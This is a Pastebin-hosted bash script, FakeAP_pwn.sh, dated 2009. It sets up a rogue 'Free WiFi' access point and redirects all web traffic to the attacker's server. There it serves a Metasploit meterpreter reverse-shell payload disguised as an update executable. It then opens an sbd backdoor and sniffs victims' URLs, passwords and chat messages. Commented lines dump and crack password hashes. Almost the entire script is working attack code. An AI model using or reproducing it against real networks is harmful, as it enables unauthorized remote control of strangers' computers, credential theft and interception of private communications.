Advertisement
Guest User

g0tmi1k

a guest
Jun 25th, 2009
4,761
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 3.44 KB | None | 0 0
  1. #! /bin/bash
  2. # (C)opyright 2009 - g0tmi1k
  3. #
  4. # FakeAP_pwn.sh
  5.  
  6. # Settings
  7. export  gatewayip=192.168.1.1
  8. export internet_interface=wlan0
  9. export   fakeap_interface=wlan1
  10. echo "[>] Starting: FakeAP_pwn - g0tmi1k"
  11.  
  12. # FakeAP
  13. echo "[+] Setting up FakeAP"
  14. modprobe tun
  15. xterm -geometry 75x15+1+0 -T FakeAP -e airbase-ng -P -C 30 -e "Free WiFi" $fakeap_interface -v&
  16. sleep 2
  17.  
  18. # Tables
  19. echo "[+] Setting up forwarding tables..."
  20. ifconfig lo up
  21. ifconfig at0 up
  22. ifconfig at0 10.0.0.1 netmask 255.255.255.0
  23. ifconfig at0 mtu 1400
  24. route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
  25. iptables --flush
  26. iptables --table nat --flush
  27. iptables --delete-chain
  28. iptables --table nat --delete-chain
  29. echo 1 > /proc/sys/net/ipv4/ip_forward
  30. iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
  31. #iptables -P FORWARD ACCEPT
  32. iptables --append FORWARD --in-interface at0 -j ACCEPT
  33. iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
  34.  
  35. # DHCP
  36. echo "[+] Setting up DHCP server..."
  37. xterm -geometry 75x25+1+100 -T DHCP -e dhcpd3 -d -f -cf /root/FakeAP_pwn/dhcpd.conf at0&
  38. sleep 2
  39.  
  40. # Need the user to come here
  41. echo "[+] Start web server..."
  42. #xterm -geometry 75x25+1+200  -T WebServer -e sh -c "start-apache"&
  43. xterm -geometry 75x25+1+200  -T WebServer -e /etc/init.d/apache2 start
  44. sleep 2
  45.  
  46. # So lets force them!
  47. echo "[+] Force user to vist our site..."
  48. iptables -t nat -A PREROUTING -p tcp --dport 80 -j DNAT --to 10.0.0.1
  49.  
  50. # Bad boy stuff!
  51. echo "[+] Here comes metasploit..."
  52. cd /pentest/exploits/framework3
  53. ./msfpayload windows/meterpreter/reverse_tcp LHOST=10.0.0.1 X > /var/www/MS016455.exe
  54. echo "[+] Uploading SBD..."
  55. xterm -geometry 75x25+1+300 -T Metasploit -e ./msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=10.0.0.1 AutoRunScript=/root/FakeAP_pwn/fakeap_pwn.rb E&
  56. sleep 2
  57. # upload //root/FakeAP_pwn/ C:/
  58. # execute -f "C:/sbdbg.exe -q -r 10 -k g0tmi1k -e cmd -p 7332 10.0.0.1"
  59. #./msfconsole -r /root/FakeAP_pwn/fakeap_pwn.rc
  60.  
  61. # Wait till user is connected
  62. rm -r /tmp/FakeAP_pwn.tmp
  63. echo "[-] Waitng for target to connect..."
  64. while [ ! -e /tmp/FakeAP_pwn.tmp ]; do
  65. sleep 1
  66. done
  67.  
  68. # They give us access to their system, so lets give them internet back ;)
  69. echo "[+] Give them (our) internet back..."
  70. route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
  71. iptables --flush
  72. iptables --table nat --flush
  73. iptables --delete-chain
  74. iptables --table nat --delete-chain
  75. iptables -t nat -A PREROUTING -p udp -j DNAT --to $gatewayip
  76. #iptables -P FORWARD ACCEPT
  77. iptables --append FORWARD --in-interface at0 -j ACCEPT
  78. iptables --table nat --append POSTROUTING --out-interface $internet_interface -j MASQUERADE
  79.  
  80. # Lets connect! =)
  81. # *** If FakeAP_pwn.rb upload bit is edited, you could replace the line below with VNC! ***
  82. echo "[+] Lets us back in..."
  83. konsole -T BackDoor -e sbd -l -k g0tmi1k -p 7332&
  84. sleep 2
  85.  
  86. # Get as much info as poss!
  87. echo "[+] Watch what they do..."
  88. # URLs
  89. xterm -geometry 100x10+470+0 -T URLs -e urlsnarf -i wlan0&
  90. # Passwords
  91. xterm -geometry 100x10+470+150 -T Passwords -e dsniff -i wlan0&
  92. # IM Chats
  93. xterm -geometry 100x10+470+300 -T "IM Chat" -e msgsnarf -i wlan0&
  94. echo
  95. echo "[+] DONE - Have you, g0tmi1k?"
  96.  
  97.  
  98. # Lets get some stuff from metasploit whistle we are at it!
  99. #sysinfo
  100. #getuid
  101. #use priv
  102. #hashdump > /tmp/FakeAP_pwn-hash.txt
  103. ##session -l
  104. ##session -i 1
  105.  
  106. # Lets crack the hash
  107. #cd /pentest/passwords/jtr/
  108. #./john /tmp/FakeAP_pwn-hash.txt
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement